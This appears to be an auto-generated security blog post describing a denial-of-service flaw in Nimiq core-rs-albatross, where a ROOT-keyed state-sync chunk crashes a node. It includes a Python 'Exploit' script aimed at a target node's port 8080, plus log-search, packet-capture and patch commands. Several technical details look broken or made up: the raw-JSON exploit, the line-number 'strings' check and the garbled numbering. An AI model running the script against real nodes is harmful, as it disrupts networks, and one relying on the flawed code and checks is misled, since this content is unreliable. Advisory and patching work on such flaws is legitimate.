Listen to this Post
1. The vulnerability exists in the `MerkleRadixTrie::put_chunk` function.
- An unauthenticated remote attacker can send a malicious state-sync chunk.
- The chunk contains a `TrieItem` with an empty (ROOT) key.
- This chunk passes sorting, range, and Merkle-proof validation.
- When processed, `put_raw` attempts to store a value at the root node.
6. `TrieNode::put_value` is called, which returns `Err(RootCantHaveValue)`.
- The code uses `.unwrap()` on the result, causing a panic.
- The panic aborts the node process (denial of service).
- The attack works on nodes performing state synchronization.
10. Fresh nodes joining the network are vulnerable.
- Existing nodes recovering from data loss are also vulnerable.
- There is no rate limit or authentication to prevent the attack.
- The malicious peer only needs to respond to a
RequestChunk. - The first malicious chunk committed triggers the crash.
15. Honest nodes never construct ROOT-keyed items.
16. Therefore, non-syncing operations are unaffected.
17. The affected code is in `primitives/trie/src/trie.rs`.
18. `put_chunk` is around line 819, `put_raw` around line 351.
19. The vulnerability is fixed by rejecting ROOT-keyed items.
20. No in-process workaround exists; a patch is required.
DailyCVE form:
Platform: Nimiq core-rs-albatross
Version: before commit 0fb8766
Vulnerability: Denial-of-Service DoS
Severity: High
date: 2026-05-15
Prediction: patch date 2026-05-15
What Undercode Say:
Analytics:
Search for the panic in node logs grep -E "RootCantHaveValue|panicked at 'called `Result::unwrap()` on an `Err` value" /var/log/nimiq/node.log Monitor state-sync requests for anomalies tcpdump -i eth0 -n 'tcp port 8080 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x52657175)' "Requ" in hex Check if a node is running a vulnerable version strings $(which nimiq-node) | grep -E "put_chunk.819|put_raw.351"
Exploit:
!/usr/bin/env python3
import socket
import json
Craft a malicious state-sync chunk with an empty ROOT key
malicious_chunk = {
"items": [{"key": "", "value": "malicious"}],
"end_key": None
}
Send to a vulnerable node's state-sync port (e.g., 8080)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("target.node.ip", 8080))
sock.send(json.dumps(malicious_chunk).encode())
sock.close()
Protection from this CVE:
Update to the patched version cd core-rs-albatross && git pull && cargo build --release Alternatively, apply the specific commit fix git fetch origin pull/3762/head && git cherry-pick 0fb8766 Restart the node after updating systemctl restart nimiq-node
Impact:
A single malicious chunk crashes any vulnerable node during state sync, enabling an unauthenticated attacker to repeatedly take down fresh or recovering nodes, disrupting network stability and preventing new nodes from joining.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

